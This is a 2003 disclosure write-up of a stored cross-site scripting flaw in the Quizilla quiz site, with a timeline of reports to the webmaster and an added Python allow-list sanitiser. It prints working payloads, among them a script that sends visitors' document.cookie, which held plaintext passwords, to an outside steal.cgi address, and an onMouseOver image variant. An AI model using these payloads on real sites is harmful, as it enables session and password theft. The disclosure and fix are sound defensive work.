Quizilla Javascript Vulnerability

Quizilla is an online site which allows people to create 'quizzes' for posting in online journals such as LiveJournal, and other blogs.

Quizzes usually take the form of a series of questions which may be answered via an HTML form, generating a result.

The intention is that you will complete the form, and receive a result which contains HTML that you should post within your journal.

Amongst other things, this result will contain a link to the quiz site, allowing your friends to take the same test. This is an interesting example of memes in action; seeing the same quiz appear in multiple online journals must be very interesting for their creators.

My Involvement

I've seen many quizzes hosted upon this site in friends' journals, and finally decided to create my own.

After signing up and logging in I was able to create an account 'skx', and my first quiz.

Within two hours, 275 people had filled it in.

The vulnerability

Each of the quizzes contains a series of questions which are entered by the creator of the quiz.

There is no validation or filtering of the questions which are entered; the text is placed into the quiz page as-is, which makes executing JavaScript trivial.

For example the following question resulted in a dialog box appearing whenever the quiz was shown:

<script>alert(document.cookie);</script>

The cookie which was displayed looked like this:

  username=skx; password=not-my-password

As you can see, the username and password were both stored in plaintext: not encrypted, hashed, or obfuscated.

Launching an automated attack would be as simple as writing a small CGI script to email the results of this question:

<script>document.location=
   "http://www.steve.org.uk/cgi-bin/steal.cgi?" + document.cookie;
</script>

Fixing this problem

The suggested fix was to convert all the '<' characters in questions, titles, and results to '&lt;' and all the '>' characters to '&gt;'.

The webmaster of the site correctly pointed out that this would prevent all embedded HTML, such as bold and italic tags, from working. His eventual solution fixed the problem directly.

Last Minute

After the initial notification I realised that it wasn't just the <script> tag which was problematic; event-handler attributes on otherwise harmless tags work just as well. The following code is also malicious:

<img src="http://www.steve.org.uk/images/Steve/2.jpg"
     onMouseOver="alert(document.cookie);">
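To show what a fix that satisfies both constraints above looks like (neutralise <script> and event-handler attributes such as onMouseOver, while still letting bold and italic markup through), here is an added example written for this page; it is not Quizilla's code and it is not the fix the webmaster deployed. It contrasts the blanket entity-escaping first suggested with an allow-list sanitiser: only a small set of tag names (b, i, em, strong, an assumption made for the example) pass through, and only when they carry no attributes at all, so there is nowhere left for an event handler to hide. Everything else, including the two payloads quoted on this page, is turned into inert text.

```python
import html
from html.parser import HTMLParser

# Tags the quiz author may use for emphasis. Assumption for this example:
# the site only needs bold/italic; nothing here carries attributes.
ALLOWED_TAGS = {"b", "i", "em", "strong"}


def escape_all(text: str) -> str:
    """The first fix suggested on the page: turn every '<' and '>' into an
    entity. Safe, but it also disables legitimate <b>/<i> markup."""
    return text.replace("<", "&lt;").replace(">", "&gt;")


class AllowlistSanitizer(HTMLParser):
    """Re-emit the input, keeping only attribute-free allow-listed tags and
    escaping every other tag, attribute and stray angle bracket."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=False)
        self.out: list[str] = []

    def handle_starttag(self, tag, attrs):
        # Tag names are lower-cased by the parser, so <B> and <b> are equal.
        if tag in ALLOWED_TAGS and not attrs:
            self.out.append(f"<{tag}>")
        else:
            # Unknown tag, or an allowed tag with attributes (<b onmouseover=...>):
            # escape the raw tag text so the browser renders it as plain text.
            self.out.append(html.escape(self.get_starttag_text()))

    def handle_startendtag(self, tag, attrs):
        # Self-closing forms such as <img .../> are never allowed here.
        self.out.append(html.escape(self.get_starttag_text()))

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")
        else:
            self.out.append(html.escape(f"</{tag}>"))

    def handle_data(self, data):
        # Text content (including the body of a <script> block, which the
        # parser hands back as data) is escaped so it cannot reopen a tag.
        self.out.append(html.escape(data, quote=False))

    def handle_entityref(self, name):
        self.out.append(f"&{name};")  # keep existing entities such as &amp;

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        pass  # comments, declarations and processing instructions are dropped


def sanitize(text: str) -> str:
    """Sanitise one quiz question, title or result for safe inclusion in a page."""
    parser = AllowlistSanitizer()
    parser.feed(text)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed inputs: the two payloads quoted on this page plus a benign one.
    samples = [
        "<script>alert(document.cookie);</script>",
        '<img src="http://www.steve.org.uk/images/Steve/2.jpg"\n'
        '     onMouseOver="alert(document.cookie);">',
        "What is <b>your</b> favourite <I>colour</I>?",
    ]
    for s in samples:
        print("escape_all:", escape_all(s))
        print("sanitize:  ", sanitize(s))
        print()
```

Run as a script it prints both treatments side by side: escape_all() disables the benign bold/italic question along with the attacks, whereas sanitize() keeps "<b>your</b>" and "<i>colour</i>" intact and renders the <script> block and the onMouseOver image tag as visible, harmless text. The deliberate design choice is that the allow-list is on tag names and attributes are refused outright; an allow-list that permitted "safe" attributes would have to reason about every on* handler and javascript: URL, which is exactly the mistake the Last Minute section records.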

Notification

A small log of the communication involved:

  • Flaw spotted around 8PM.
  • Mail sent to 'webmaster', 'support', and 'security' at 21:15 11/03/2003
  • <script> flaw confirmed at 22:00 11/03/2003
  • I was notified that the <script> flaw was fixed at 19:40 12/03/2003
  • Verified that all forms of <script> attacks were fixed at 20:00 12/03/2003
  • Notified the author that the site was still vulnerable via 'onMouseOver' etc. at 20:06 12/03/2003
  • Verified at 20:13 12/03/2003

(All times GMT)

Thanks to M Nielsen for reacting so quickly, and for being ready to acknowledge the flaw.